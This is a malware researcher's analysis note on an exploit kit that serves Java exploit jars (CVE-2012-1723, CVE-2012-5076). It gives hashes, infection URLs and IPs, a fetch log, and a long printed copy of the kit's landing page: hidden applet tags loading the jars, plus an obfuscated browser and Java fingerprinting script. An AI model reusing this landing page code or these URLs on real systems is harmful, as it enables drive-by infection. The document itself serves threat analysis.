#MMD - JAR CVE-2012-1723 + CVE-2012-5076 JAR Analysis #Guide

================================================================================
#MalwareMustDie - Tue Jan  8 21:36:28 JST 2013
Unknown Exploit Kit dropping 2 jars for the payload (in the applet parts)
used the modified plugindetect script, w/o payload leads.
This is an analysis GUIDE of of Jar CVE-2012-1723 + CVE-2012-5076
(sorry, got not enough time.. can't check the payload yet.
 pls continue or follow from this lead)
================================================================================
first jar: jimmdemy.jar
MD5:    be2bcd6c3f2aee6432358e1fb37a8dc2
File size:  9.2 KB ( 9465 bytes )
File name:  jimmdemy.jar
File type:  JAR
Tags:   exploit jar cve-2012-1723
Detection ratio:    7 / 45  <========== IMPORTANT!!!
Analysis date:  2013-01-08 10:40:02 UTC ( 25 分 ago )
https://www.virustotal.com/file/2eb97401ca9954d4cf2ca5ad881598e9ea8981d6b89bd017e7b21bc0e153b70b/analysis/
================================================================================
second jar: torylane.jar
MD5:    ae66fc69244abec22f20384356806ad2
File size:  5.4 KB ( 5502 bytes )
File name:  torylane.jar
File type:  JAR
Tags:   jar
Detection ratio:    1 / 46  <======== LOW DETECTION!!
Analysis date:  2013-01-08 12:50:22 UTC ( 39 分 ago )
https://www.virustotal.com/file/92ad670f3d32c91afffc60c54e9c5d19095d827ec86d2d89ebfa0a7856fa93e8/analysis/
================================================================================

//=====================
//Source of infection
//=====================
-------------------------------------------------------------------------
URL                                                             IP
-------------------------------------------------------------------------
afgarcia67.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070         217.23.6.57
davidsonfrc89.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070      217.23.6.57
-------------------------------------------------------------------------

// Checked, it was the same coded landing page, so I focus to one:
URL: davidsonfrc89.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070

// a fetch log... (PS: can't downloads too many times w/ same params..)

--18:17:07--  h00p://davidsonfrc89.net/Jdowu32ds2s/lavaafly.php?janeoleg=875070
           => `lavaafly.php@janeoleg=875070'
Resolving davidsonfrc89.net... seconds 0.00, 217.23.6.57
Caching davidsonfrc89.net => 217.23.6.57
Connecting to davidsonfrc89.net|217.23.6.57|:80... seconds 0.00, connected.
   :
GET /Jdowu32ds2s/lavaafly.php?janeoleg=875070 HTTP/1.0

User-Agent: #MalwareMustDie Playing with your jars
Accept: */*
Host: davidsonfrc89.net
Connection: Keep-Alive
   :
HTTP request sent, awaiting response...
   :
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 08 Jan 2013 07:30:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
  :
200 OK
Registered socket 3 for persistent reuse.
URI content encoding = `UTF-8'
Length: unspecified [text/html]
Saving to: `lavaafly.php?janeoleg=875070'
2013-01-08 16:30:35 (33.6 KB/s) - `lavaafly.php?janeoleg=875070' saved [29766]

// It's an obfusctation of HTML with plugindetect script:

================================================================================

//=====================
//Landing page
// *) the payload urls looks only is in the applet parts...
//=====================
<applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1"><param name="bhjwfffiorjwe" value="0jfX19NXhX1MMX0ZltNjk9k/agtjNgs9hgZpBVthZX8.:jfg2.8/N/sljhaf0f/2lMBM9atrZag3Bd38oXfVNsB.fs0jC1BhtgeMZ/8j.30tajCCNNZtt9sX/0Ndga98shkk0CsCVN3VgB0gVkfs09kZi30MBdV..aNsfVftf3nV99fkgt2tBf/jas1.o2sXt2XtfnVh./hj8.itVfkaftCoC/30aCV399d/B1/3M.j8gBljBsn33h/khB9efZZglsj3thkNasMNg/j8.glXXtJZ8.CdXMNdt33ststhohXMZ/38dw92B8gl32u.8Zkg30g39BX21Xkl2lCXaXMjfdj8kC/aZ/s33sf280C2ZdMk9Cj3sd2/1jdaN/adltfB/kjNlNf/k3gaMhBk/8aknVt3/d.MjukXjZldVCdfs/dh2C1ekk3st.f0n.dCdkaZgtB120/Nhj.CjZ.al0jpjCgjC0.Ch3B2lCjZdp"></applet><applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1"><param name="bhjiorjwe" value=".f//9jkMhNVgB1l2tt0djf3j32t21/Z.M0.p1C3X3a/g:1h.ZM2Zs/t1Z/.g92/l0flsta8rV/gXth/1oV3dl0Vj1sM1VMlZjdesXffXhsdtfN1h2VlNtBfCf.8tgaB020sa3fsBkBsX0g8gdlka9jXhiBkVXtV/Cah1fZ9d1gnghX/t39jtt.f2d2k9o.2htZjV2nt/j2ktdXih1NgVfC0oj/NZ90j19NB9.8M98.gaVXa8lMnCC2f3ZtsegXCsd331tZ00hlZdN/N8aB1ktgJ980Vf09Vdjg2Zj0k1og3lNhft8wkaZ/dZf.uftCC0Mf/32lMl9C8k2N/V8dV0Md1kh/CC//sCBBh.8f22/131h132s0BV/dgh//XV3kj2s3jg0jgBXkNajljC8sMXn0lZ/N93tuM9d0CgCtdl8gVMBk0eVMfNB1tjn8Ndhflg0t3CMX.aXa.//0hN3akpfhV8l0s/hkgjNZVkgp"></applet><html><body></body><script type="text/javascript">var actojack={version:"ruptable",name:"actojack",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parseInt;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.length);a++){if(g(c[a],10)>g(b[a],10)){return 1}if(g(c[a],10)<g(b[a],10)){return -1}}}return 0},formatNum:function(b,c){var d=this,a,e;if(!d.isStrNum(b)){return null}if(!d.isNum(c)){c=4}c--;e=b.replace(/\s/g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);for(a=0;a<4;a++){if(/^(0+)(.+)$/.test(e[a])){e[a]=RegExp.$2}if(a>c||!(/\d/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return function(c){if(!a.isIE&&c){var f,e,b,d=a.isArray(c)?c:(a.isString(c)?[c]:[]);for(b=0;b<d.length;b++){if(a.isString(d[b])&&/[^\s]/.test(d[b])){f=navigator.mimeTypes[d[b]];e=f?f.enabledPlugin:0;if(e&&(e.name||e.description)){return f}}}}return null}},findNavPlugin:function(l,e,c){var j=this,h=new RegExp(l,"i"),d=(!j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){m=a[f].description||g;b=a[f].name||g;if((h.test(m)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))||(h.test(b)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))){if(!k||!(k.test(m)||k.test(b))){return a[f]}}}return null},getMimeEnabledPlugin:function(k,m,c){var e=this,f,b=new RegExp(m,"i"),h="",g=c?new RegExp(c,"i"):0,a,l,d,j=e.isString(k)?[k]:k;for(d=0;d<j.length;d++){if((f=e.hasMimeType(j[d]))&&(f=f.enabledPlugin)){l=f.description||h;a=f.name||h;if(b.test(l)||b.test(a)){if(!g||!(g.test(l)||g.test(a))){return f}}}}return 0},getPluginFileVersion:function(f,b){var h=this,e,d,g,a,c=-1;if(h.OS>2||!f||!f.version||!(e=h.getNum(f.version))){return b}if(!b){return e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a<d.length;a++){if(c>-1&&a>c&&d[a]!="0"){return b}if(g[a]!=d[a]){if(c==-1){c=a}if(d[a]!="0"){return b}}}return e},AXO:window.ActiveXObject,getAXO:function(a){var f=null,d,b=this,c={};try{f=new b.AXO(a)}catch(d){}return f},convertFuncs:function(f){var a,g,d,b=/^[\$][\$]/,c=this;for(a in f){if(b.test(a)){try{wx=2;g=a.slice(wx);if(g.length>0&&!f[g]){f[g]=f[a](f);delete f[a]}}catch(d){}}}},initObj:function(e,b,d){var a,c;if(e){if(e[b[0]]==1||d){for(a=0;a<b.length;a=a+2){e[b[a]]=b[a+1]}}for(a in e){c=e[a];if(c&&c[b[0]]==1){this.initObj(c,b)}}}},initScript:function(){var c=this,a=navigator,e="/",f,i=a.userAgent||"",g=a.vendor||"",b=a.platform||"",h=a.product||"";c.initObj(c,["$",c]);for(f in c.Plugins){if(c.Plugins[f]){c.initObj(c.Plugins[f],["$",c,"$$",c.Plugins[f]],1)}};c.OS=100;if(b){var d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win.*CE",22.1,"Win.*Mobile",22.2,"Pocket\s*PC",22.3,"",100];for(f=d.length-2;f>=0;f=f-2){if(d[f]&&new RegExp(d[f],"i").test(b)){c.OS=d[f+1];break}}}c.convertFuncs(c);c.head=(document.getElementsByTagName("head")[0]||document.getElementsByTagName("body")[0]||document.body||null);c.isIE=(new Function("return "+e+"*@cc_on!@*"+e+"false"))();c.verIE=c.isIE&&(/MSIE\s*(\d+\.?\d*)/i).test(i)?parseFloat(RegExp.$1,10):null;c.ActiveXEnabled=false;if(c.isIE){var f,j=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","ShockwaveFlash.ShockwaveFlash","TDCCtl.TDCCtl","Shell.UIHelper","Scripting.Dictionary","wmplayer.ocx"];for(f=0;f<j.length;f++){if(c.getAXO(j[f])){c.ActiveXEnabled=true;break}}}c.isGecko=(/Gecko/i).test(h)&&(/Gecko\s*\/\s*\d/i).test(i);c.verGecko=c.isGecko?c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i)?RegExp.$1:"0.9"):null;c.isChrome=(/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);c.verChrome=c.isChrome?c.formatNum(RegExp.$1):null;c.isSafari=((/Apple/i).test(g)||(!g&&!c.isChrome))&&(/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);c.verSafari=c.isSafari&&(/Version\s*\/\s*(\d[\d\.]*)/i).test(i)?c.formatNum(RegExp.$1):null;c.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);c.verOpera=c.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(i)||1)?parseFloat(RegExp.$1,10):null;c.addWinEvent("load",c.handler(c.runWLfuncs,c))},init:function(d){var c=this,b,d,a={status:-3,plugin:0};if(!c.isString(d)){return a}if(d.length==1){c.getVersionDelimiter=d;return a}d=d.toLowerCase().replace(/\s/g,"");b=c.Plugins[d];if(!b||!b.getVersion){return a}a.plugin=b;if(!c.isDefined(b.installed)){b.installed=null;b.version=null;b.version0=null;b.getVersionDone=null;b.pluginName=d}c.garbage=false;if(c.isIE&&!c.ActiveXEnabled&&d!=="java"){a.status=-2;return a}a.status=1;return a},fPush:function(b,a){var c=this;if(c.isArray(a)&&(c.isFunc(b)||(c.isArray(b)&&b.length>0&&c.isFunc(b[0])))){a.push(b)}},callArray:function(b){var c=this,a;if(c.isArray(b)){for(a=0;a<b.length;a++){if(b[a]===null){return}c.call(b[a]);b[a]=null}}},call:function(c){var b=this,a=b.isArray(c)?c.length:-1;if(a>0&&b.isFunc(c[0])){c[0](b,a>1?c[1]:0,a>2?c[2]:0,a>3?c[3]:0)}else{if(b.isFunc(c)){c(b)}}},$$isMinVersion:function(a){return function(h,g,d,c){var e=a.init(h),f,b=-1,j={};if(e.status<0){return e.status}f=e.plugin;g=a.formatNum(a.isNum(g)?g.toString():(a.isStrNum(g)?a.getNum(g):"0"));if(f.getVersionDone!=1){f.getVersion(g,d,c);if(f.getVersionDone===null){f.getVersionDone=1}}a.cleanup();if(f.installed!==null){b=f.installed<=0.5?f.installed:(f.installed==0.7?1:(f.version===null?0:(a.compareNums(f.version,g,f)>=0?1:-0.1)))};return b}},getVersionDelimiter:",",$$getVersion:function(a){return function(g,d,c){var e=a.init(g),f,b,h={};if(e.status<0){return null};f=e.plugin;if(f.getVersionDone!=1){f.getVersion(null,d,c);if(f.getVersionDone===null){f.getVersionDone=1}}a.cleanup();b=(f.version||f.version0);b=b?b.replace(a.splitNumRegx,a.getVersionDelimiter):b;return b}},cleanup:function(){var a=this;if(a.garbage&&a.isDefined(window.CollectGarbage)){window.CollectGarbage()}},addWinEvent:function(d,c){var e=this,a=window,b;if(e.isFunc(c)){if(a.addEventListener){a.addEventListener(d,c,false)}else{if(a.attachEvent){a.attachEvent("on"+d,c)}else{b=a["on"+d];a["on"+d]=e.winHandler(c,b)}}}},winHandler:function(d,c){return function(){d();if(typeof c=="function"){c()}}},WLfuncs0:[],WLfuncs:[],runWLfuncs:function(a){var b={};a.winLoaded=true;a.callArray(a.WLfuncs0);a.callArray(a.WLfuncs);if(a.onDoneEmptyDiv){a.onDoneEmptyDiv()}},winLoaded:false,$$onWindowLoaded:function(a){return function(b){if(a.winLoaded){a.call(b)}else{a.fPush(b,a.WLfuncs)}}},$$onDetectionDone:function(a){return function(h,g,c,b){var d=a.init(h),k,e,j={};if(d.status==-3){return -1}e=d.plugin;if(!a.isArray(e.funcs)){e.funcs=[]}if(e.getVersionDone!=1){k=a.isMinVersion?a.isMinVersion(h,"0",c,b):a.getVersion(h,c,b)}if(e.installed!=-0.5&&e.installed!=0.5){a.call(g);return 1}if(e.NOTF){a.fPush(g,e.funcs);return 0}return 1}},div:null,divID:"actojack",divWidth:50,pluginSize:1,emptyDiv:function(){var d=this,b,h,c,a,f,g;if(d.div&&d.div.childNodes){for(b=d.div.childNodes.length-1;b>=0;b--){c=d.div.childNodes[b];if(c&&c.childNodes){for(h=c.childNodes.length-1;h>=0;h--){g=c.childNodes[h];try{c.removeChild(g)}catch(f){}}}if(c){try{d.div.removeChild(c)}catch(f){}}}}if(!d.div){a=document.getElementById(d.divID);if(a){d.div=a}}if(d.div&&d.div.parentNode){try{d.div.parentNode.removeChild(d.div)}catch(f){}d.div=null}},DONEfuncs:[],onDoneEmptyDiv:function(){var c=this,a,b;if(!c.winLoaded){return}if(c.WLfuncs&&c.WLfuncs.length&&c.WLfuncs[c.WLfuncs.length-1]!==null){return}for(a in c){b=c[a];if(b&&b.funcs){if(b.OTF==3){return}if(b.funcs.length&&b.funcs[b.funcs.length-1]!==null){return}}}for(a=0;a<c.DONEfuncs.length;a++){c.callArray(c.DONEfuncs)}c.emptyDiv()},getWidth:function(c){if(c){var a=c.scrollWidth||c.offsetWidth,b=this;if(b.isNum(a)){return a}}return -1},getTagStatus:function(m,g,a,b){var c=this,f,k=m.span,l=c.getWidth(k),h=a.span,j=c.getWidth(h),d=g.span,i=c.getWidth(d);if(!k||!h||!d||!c.getDOMobj(m)){return -2}if(j<i||l<0||j<0||i<0||i<=c.pluginSize||c.pluginSize<1){return 0}if(l>=i){return -1}try{if(l==c.pluginSize&&(!c.isIE||c.getDOMobj(m).readyState==4)){if(!m.winLoaded&&c.winLoaded){return 1}if(m.winLoaded&&c.isNum(b)){if(!c.isNum(m.count)){m.count=b}if(b-m.count>=10){return 1}}}}catch(f){}return 0},getDOMobj:function(g,a){var f,d=this,c=g?g.span:0,b=c&&c.firstChild?1:0;try{if(b&&a){d.div.focus()}}catch(f){}return b?c.firstChild:null},setStyle:function(b,g){var f=b.style,a,d,c=this;if(f&&g){for(a=0;a<g.length;a=a+2){try{f[g[a]]=g[a+1]}catch(d){}}}},insertDivInBody:function(a,i){var h,f=this,b="pd33993399",d=null,j=i?window.top.document:window.document,c="<",g=(j.getElementsByTagName("body")[0]||j.body);if(!g){try{j.write(c+'div id="'+b+'">o'+c+"/div>");d=j.getElementById(b)}catch(h){}}g=(j.getElementsByTagName("body")[0]||j.body);if(g){if(g.firstChild&&f.isDefined(g.insertBefore)){g.insertBefore(a,g.firstChild)}else{g.appendChild(a)}if(d){g.removeChild(d)}}else{}},insertHTML:function(g,b,h,a,l){var m,n=document,k=this,q,p=n.createElement("span"),o,j,f="<";var c=["outlineStyle","none","borderStyle","none","padding","0px","margin","0px","visibility","visible"];var i="outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";if(!k.isDefined(a)){a=""}if(k.isString(g)&&(/[^\s]/).test(g)){g=g.toLowerCase().replace(/\s/g,"");q=f+g+' width="'+k.pluginSize+'" height="'+k.pluginSize+'" ';q+='style="'+i+'display:inline;" ';for(o=0;o<b.length;o=o+2){if(/[^\s]/.test(b[o+1])){q+=b[o]+'="'+b[o+1]+'" '}}q+=">";for(o=0;o<h.length;o=o+2){if(/[^\s]/.test(h[o+1])){q+=f+'param name="'+h[o]+'" value="'+h[o+1]+'" />'}}q+=a+f+"/"+g+">"}else{q=a}if(!k.div){j=n.getElementById(k.divID);if(j){k.div=j}else{k.div=n.createElement("div");k.div.id=k.divID}k.setStyle(k.div,c.concat(["width",k.divWidth+"px","height",(k.pluginSize+3)+"px","fontSize",(k.pluginSize+3)+"px","lineHeight",(k.pluginSize+3)+"px","verticalAlign","baseline","display","block"]));if(!j){k.setStyle(k.div,["position","absolute","right","0px","top","0px"]);k.insertDivInBody(k.div)}}if(k.div&&k.div.parentNode){k.setStyle(p,c.concat(["fontSize",(k.pluginSize+3)+"px","lineHeight",(k.pluginSize+3)+"px","verticalAlign","baseline","display","inline"]));try{p.innerHTML=q}catch(m){};try{k.div.appendChild(p)}catch(m){};return{span:p,winLoaded:k.winLoaded,tagName:g,outerHTML:q}}return{span:null,winLoaded:k.winLoaded,tagName:"",outerHTML:q}},file:{$:1,any:"fileStorageAny999",valid:"fileStorageValid999",save:function(d,f,c){var b=this,e=b.$,a;if(d&&e.isDefined(c)){if(!d[b.any]){d[b.any]=[]}if(!d[b.valid]){d[b.valid]=[]}d[b.any].push(c);a=b.split(f,c);if(a){d[b.valid].push(a)}}},getValidLength:function(a){return a&&a[this.valid]?a[this.valid].length:0},getAnyLength:function(a){return a&&a[this.any]?a[this.any].length:0},getValid:function(c,a){var b=this;return c&&c[b.valid]?b.get(c[b.valid],a):null},getAny:function(c,a){var b=this;return c&&c[b.any]?b.get(c[b.any],a):null},get:function(d,a){var c=d.length-1,b=this.$.isNum(a)?a:c;return(b<0||b>c)?null:d[b]},split:function(g,c){var b=this,e=b.$,f=null,a,d;g=g?g.replace(".","\."):"";d=new RegExp("^(.*[^\/])("+g+"\s*)$");if(e.isString(c)&&d.test(c)){a=(RegExp.$1).split("/");f={name:a[a.length-1],ext:RegExp.$2,full:c};a[a.length-1]="";f.path=a.join("/")}return f},z:0},Plugins:{java:{mimeType:["application/x-java-applet","application/x-java-vm","application/x-java-bean"],classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",navigator:{a:window.navigator.javaEnabled(),javaEnabled:function(){return this.a},mimeObj:0,pluginObj:0},OTF:null,minIEver:7,debug:0,debugEnable:function(){var a=this,b=a.$;a.debug=1},isDisabled:{$:1,DTK:function(){var a=this,c=a.$,b=a.$$;if((c.isGecko&&c.compareNums(c.verGecko,c.formatNum("1.6"))<=0)||(c.isSafari&&c.OS==1&&(!c.verSafari||c.compareNums(c.verSafari,"5,1,0,0")<0))||c.isChrome||(c.isIE&&!c.ActiveXEnabled)){return 1}return 0},AXO:function(){var a=this,c=a.$,b=a.$$;return(!c.isIE||!c.ActiveXEnabled||(!b.debug&&b.DTK.query().status!==0))},navMime:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},navPlugin:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},windowDotJava:function(){var a=this,c=a.$,b=a.$$;if(!window.java){return 1}if(c.OS==2&&c.verOpera&&c.verOpera<9.2&&c.verOpera>=9){return 1}if(c.verGecko&&c.compareNums(c.verGecko,"1,9,0,0")<0&&c.compareNums(c.verGecko,"1,8,0,0")>=0){return 1}return 0},allApplets:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.OS>=20){return 0}if(d.verOpera&&d.verOpera<11&&!a.javaEnabled()&&!c.lang.System.getProperty()[0]){return 1}if((d.verGecko&&d.compareNums(d.verGecko,d.formatNum("2"))<0)&&!a.mimeObj&&!c.lang.System.getProperty()[0]){return 1}return 0},AppletTag:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;return d.isIE?!a.javaEnabled():0},ObjectTag:function(){var a=this,c=a.$,b=a.$$;return c.isIE?!c.ActiveXEnabled:0},z:0},getVerifyTagsDefault:function(){var a=this,c=a.$,b=[1,0,1];if(c.OS>=20){return b}if((c.isIE&&(c.verIE<9||!c.ActiveXEnabled))||(c.verGecko&&c.compareNums(c.verGecko,c.formatNum("2"))<0)||(c.isSafari&&(!c.verSafari||c.compareNums(c.verSafari,c.formatNum("4"))<0))||(c.verOpera&&c.verOpera<10)){b=[1,1,1]}return b},getVersion:function(j,g,i){var b=this,d=b.$,e,a=b.applet,h=b.verify,k=b.navigator,f=null,l=null,c=null;if(b.getVersionDone===null){b.OTF=0;k.mimeObj=d.hasMimeType(b.mimeType);if(k.mimeObj){k.pluginObj=k.mimeObj.enabledPlugin}if(h){h.begin()}}a.setVerifyTagsArray(i);d.file.save(b,".jar",g);if(b.getVersionDone===0){if(a.should_Insert_Query_Any()){e=a.insert_Query_Any();b.setPluginStatus(e[0],e[1],f)}return}if((!f||b.debug)&&b.DTK.query().version){f=b.DTK.version}if((!f||b.debug)&&b.navMime.query().version){f=b.navMime.version}if((!f||b.debug)&&b.navPlugin.query().version){f=b.navPlugin.version}if((!f||b.debug)&&b.AXO.query().version){f=b.AXO.version}if(b.nonAppletDetectionOk(f)){c=f}if(!c||b.debug||a.VerifyTagsHas(2.2)||a.VerifyTagsHas(2.5)){e=b.lang.System.getProperty();if(e[0]){f=e[0];c=e[0];l=e[1]}}b.setPluginStatus(c,l,f);if(a.should_Insert_Query_Any()){e=a.insert_Query_Any();if(e[0]){c=e[0];l=e[1]}}b.setPluginStatus(c,l,f)},nonAppletDetectionOk:function(b){var d=this,e=d.$,a=d.navigator,c=1;if(!b||(!a.javaEnabled()&&!d.lang.System.getPropertyHas(b))||(!e.isIE&&!a.mimeObj&&!d.lang.System.getPropertyHas(b))||(e.isIE&&!e.ActiveXEnabled)){c=0}else{if(e.OS>=20){}else{if(d.info&&d.info.getPlugin2Status()<0&&d.info.BrowserRequiresPlugin2()){c=0}}}return c},setPluginStatus:function(d,f,a){var c=this,e=c.$,b;a=a||c.version0;if(c.OTF>0){d=d||c.lang.System.getProperty()[0]}if(c.OTF<3){b=d?1:(a?-0.2:-1);if(c.installed===null||b>c.installed){c.installed=b}}if(c.OTF==2&&c.NOTF&&!c.applet.getResult()[0]&&!c.lang.System.getProperty()[0]){c.installed=a?-0.2:-1};if(c.OTF==3&&c.installed!=-0.5&&c.installed!=0.5){c.installed=(c.NOTF.isJavaActive(1)==1||c.lang.System.getProperty()[0])?0.5:-0.5}if(c.OTF==4&&(c.installed==-0.5||c.installed==0.5)){if(d){c.installed=1}else{if(c.NOTF.isJavaActive(1)==1){if(a){c.installed=1;d=a}else{c.installed=0}}else{if(a){c.installed=-0.2}else{c.installed=-1}}}};if(a){c.version0=e.formatNum(e.getNum(a))}if(d){c.version=e.formatNum(e.getNum(d))}if(f&&e.isString(f)){c.vendor=f}if(!c.vendor){c.vendor=""}if(c.verify&&c.verify.isEnabled()){c.getVersionDone=0}else{if(c.getVersionDone!=1){if(c.OTF<2){c.getVersionDone=0}else{c.getVersionDone=c.applet.can_Insert_Query_Any()?0:1}}}},DTK:{$:1,hasRun:0,status:null,VERSIONS:[],version:"",HTML:null,Plugin2Status:null,classID:["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA","clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],mimeType:["application/java-deployment-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],disabled:function(){return this.$$.isDisabled.DTK()},query:function(){var k=this,g=k.$,d=k.$$,j,l,h,m={},f={},a,c=null,i=null,b=(k.hasRun||k.disabled());k.hasRun=1;if(b){return k}k.status=0;if(g.isIE&&g.verIE>=6){for(l=0;l<k.classID.length;l++){k.HTML=g.insertHTML("object",["classid",k.classID[l]],[]);c=g.getDOMobj(k.HTML);try{if(c&&c.jvms){break}}catch(j){}}}else{if(!g.isIE&&(h=g.hasMimeType(k.mimeType))&&h.type){k.HTML=g.insertHTML("object",["type",h.type],[]);c=g.getDOMobj(k.HTML)}}if(c){try{a=c.jvms;if(a){i=a.getLength();if(g.isNum(i)){k.status=i>0?1:-1;for(l=0;l<i;l++){h=g.getNum(a.get(i-1-l).version);if(h){k.VERSIONS.push(h);f["a"+g.formatNum(h)]=1}}}}}catch(j){}}h=0;for(l in f){h++}if(h&&h!==k.VERSIONS.length){k.VERSIONS=[]}if(k.VERSIONS.length){k.version=g.formatNum(k.VERSIONS[0])};return k}},AXO:{$:1,hasRun:0,VERSIONS:[],version:"",disabled:function(){return this.$$.isDisabled.AXO()},JavaVersions:[[1,9,1,40],[1,8,1,40],[1,7,1,40],[1,6,0,40],[1,5,0,30],[1,4,2,30],[1,3,1,30]],query:function(){var a=this,e=a.$,b=a.$$,c=(a.hasRun||a.disabled());a.hasRun=1;if(c){return a}var i=[],k=[1,5,0,14],j=[1,6,0,2],h=[1,3,1,0],g=[1,4,2,0],f=[1,5,0,7],d=b.getInfo?true:false,l={};if(e.verIE>=b.minIEver){i=a.search(j,j,d);if(i.length>0&&d){i=a.search(k,k,d)}}else{if(d){i=a.search(f,f,true)}if(i.length==0){i=a.search(h,g,false)}}if(i.length){a.version=i[0];a.VERSIONS=[].concat(i)};return a},search:function(a,j,p){var h,d,f=this,e=f.$,k=f.$$,n,c,l,q,b,o,r,i=[];if(e.compareNums(a.join(","),j.join(","))>0){j=a}j=e.formatNum(j.join(","));var m,s="1,4,2,0",g="JavaPlugin."+a[0]+""+a[1]+""+a[2]+""+(a[3]>0?("_"+(a[3]<10?"0":"")+a[3]):"");for(h=0;h<f.JavaVersions.length;h++){d=f.JavaVersions[h];n="JavaPlugin."+d[0]+""+d[1];b=d[0]+"."+d[1]+".";for(l=d[2];l>=0;l--){r="JavaWebStart.isInstalled."+b+l+".0";if(e.compareNums(d[0]+","+d[1]+","+l+",0",j)>=0&&!e.getAXO(r)){continue}m=e.compareNums(d[0]+","+d[1]+","+l+",0",s)<0?true:false;for(q=d[3];q>=0;q--){c=l+"_"+(q<10?"0"+q:q);o=n+c;if(e.getAXO(o)&&(m||e.getAXO(r))){i.push(b+c);if(!p){return i}}if(o==g){return i}}if(e.getAXO(n+l)&&(m||e.getAXO(r))){i.push(b+l);if(!p){return i}}if(n+l==g){return i}}}return i}},navMime:{$:1,hasRun:0,mimetype:"",version:"",length:0,mimeObj:0,pluginObj:0,disabled:function(){return this.$$.isDisabled.navMime()},query:function(){var i=this,f=i.$,a=i.$$,b=(i.hasRun||i.disabled());i.hasRun=1;if(b){return i};var n=/^\s*application\/x-java-applet;jpi-version\s*=\s*(\d.*)$/i,g,l,j,d="",h="a",o,m,k={},c=f.formatNum("0");for(l=0;l<navigator.mimeTypes.length;l++){o=navigator.mimeTypes[l];m=o?o.enabledPlugin:0;g=o&&n.test(o.type||d)?f.formatNum(f.getNum(RegExp.$1)):0;if(g&&m&&(m.description||m.name)){if(!k[h+g]){i.length++}k[h+g]=o.type;if(f.compareNums(g,c)>0){c=g}}}g=k[h+c];if(g){o=f.hasMimeType(g);i.mimeObj=o;i.pluginObj=o?o.enabledPlugin:0;i.mimetype=g;i.version=c};return i}},navPlugin:{$:1,hasRun:0,version:"",disabled:function(){return this.$$.isDisabled.navPlugin()},query:function(){var m=this,e=m.$,c=m.$$,h=c.navigator,j,l,k,g,d,a,i,f=0,b=(m.hasRun||m.disabled());m.hasRun=1;if(b){return m};a=h.pluginObj.name||"";i=h.pluginObj.description||"";document.write('if(!f||c.debug){g=/Java[^\d]*Plug-in/i;l=g.test(i)?e.for'+'matNum(e.getNum(i)):0;k=g.test(a)?e.formatNum(e.getNum(a)):0;if(l&&(e.compareNums(l,e.formatNum("1,3"))<0||e.compareNums(l,e.formatNum("2"))>=0)){l=0}if(k&&(e.compareNums(k,e.formatNum("1,3"))<0||e.compareNums(k,e.formatNum("2"))>=0)){k=0}d=l&&k?(e.compareNums(l,k)>0?l:k):(l||k);if(d){f=d}}');if(!f&&e.isSafari&&e.OS==2){j=e.findNavPlugin("Java.*\d.*Plug-in.*Cocoa",0);if(j){l=e.getNum(j.description);if(l){f=l}}};if(f){m.version=e.formatNum(f)};return m}},lang:{$:1,System:{$:1,hasRun:0,result:[null,null],disabled:function(){return this.$$.isDisabled.windowDotJava()},getPropertyHas:function(a){var b=this,d=b.$,c=b.getProperty()[0];return(a&&c&&d.compareNums(d.formatNum(a),d.formatNum(c))===0)?1:0},getProperty:function(){var f=this,g=f.$,d=f.$$,i,h={},b=(f.hasRun||f.disabled());f.hasRun=1;if(!b){var a="java_qqq990";g[a]=null;try{var c=document.createElement("script");c.type="text/javascript";c.appendChild(document.createTextNode("(function(){var e;try{if (window.java && window.java.lang && window.java.lang.System){"+g.name+"."+a+'=[window.java.lang.System.getProperty("java.version")+" ",window.java.lang.System.getProperty("java.vendor")+" 